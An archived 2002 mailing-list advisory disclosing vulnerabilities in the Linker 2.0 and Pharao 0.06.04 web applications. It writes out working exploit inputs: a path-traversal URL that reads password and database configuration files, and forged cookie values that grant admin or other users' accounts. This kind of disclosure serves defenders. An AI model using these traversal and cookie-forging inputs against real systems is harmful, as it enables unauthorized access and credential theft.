Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Security holes : Linker, Pharao

From: frog frog <leseulfrog () hotmail com>
Date: 14 Apr 2002 13:14:15 -0000


Product1 :
Linker
http://enproject.codelib.co.kr

Versions :
2.0

Problems :
- Reading in HD
- Informations recovery (passwords, DBHOST, 
DBUSER,...)

Exploits :
- /imageview.php?uid=../function/pass_info.php or 
/imageview.php?uid=../function/base_info.php 
- Set cookies :
"admin_login","1"
"linker_key1",$adminid (pass_info.php)
"linker_key2",$adminpw (pass_info.php)

More details in french :
http://www.ifrance.com/kitetoua/tuto/Linker.txt

translated by google :
http://translate.google.com/translate?u=http%3A%
2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%
2FLinker.txt&langpair=fr%7Cen&hl=fr&prev=%
2Flanguage_tools

*****************************************************

Product2 :
Pharao
http://pharao.sourceforge.net

Versions :
0.06.04

Problems :
- XSS
- Path disclosure
- Sending msg anonymously
- Access to users/admins accounts
- Reading in HD
- 
- 

Exploits :
-Set 
cookie "pharao06","YOURNICK;YOURNAME;;;;classic
_blue;en_GB;english;5" with value base64 crypted

- Set 
cookie "pharao06","ANICK;HISNAME;;;;classic_blue;e
n_GB;english;2"

- /filelist.php?op=view&ttitle=No%
20Security&tcontent=admin

etc...

More details in french :
http://www.ifrance.com/kitetoua/tuto/Pharao.txt

translated by google :
http://translate.google.com/translate?u=http%3A%
2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%
2FPharao.txt&langpair=fr%7Cen&hl=fr&prev=%
2Flanguage_tools

frog-m@n
Previous By Date Next
Previous By Thread Next

Current thread: